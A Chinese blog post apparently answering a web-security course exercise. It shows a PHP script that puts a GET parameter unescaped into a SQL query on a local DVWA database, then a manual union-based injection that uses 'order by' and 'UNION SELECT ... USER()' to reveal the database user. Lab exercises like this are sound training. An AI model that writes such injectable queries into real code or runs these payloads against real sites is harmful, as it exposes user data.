SQL回显注入实践
注意:本次实践是网易云课堂微专业(WEB安全工程师)课后练习!!!!
有如下php代码:
<?php$con=mysql_connect("localhost","root","root");//数据库连接字段,phpstudy默认root/root$id=@$_GET['id'];//通过get方式传递id的参数的值if(!$con){die('Could not connect: ' . mysql_error());}else{mysql_select_db("dvwa");//访问dvwa数据库$query="select * from users where user_id =$id";//访问users表echo mysql_result(mysql_query($query), 0, "password");//输出password这列的值}?>
如果你的dvwa是默认配置安装的,将其命名成test.php放到web根目录下访问
http://127.0.0.1/test.php?id=1,我们将看到
请完成手工sql回显注入,页面输出user()结果,如图所示
请将这个url补充完整并简单描述注入的过程
注意:url必须以http://127.0.0.1/test.php?id=1开始,且得到页面上的显示,否则不得分
提示:利用sql关键字order by和union select
思路:首先用
http://127.0.0.1/test.php?id=1 order by 10这种二分法,找到表结构;
最后知道是8列。然后用union select 进行填充查询:
链接如下:
http://127.0.0.1/test.php??id=1 AND 1=2 UNION SELECT 1,1,1,1,USER(),1,1,1
截图如下:
总结
- 上一篇: Qt奇淫技巧-使用QSharedMemo
- 下一篇: Qt工作笔记-以配置文件的方式动态获取M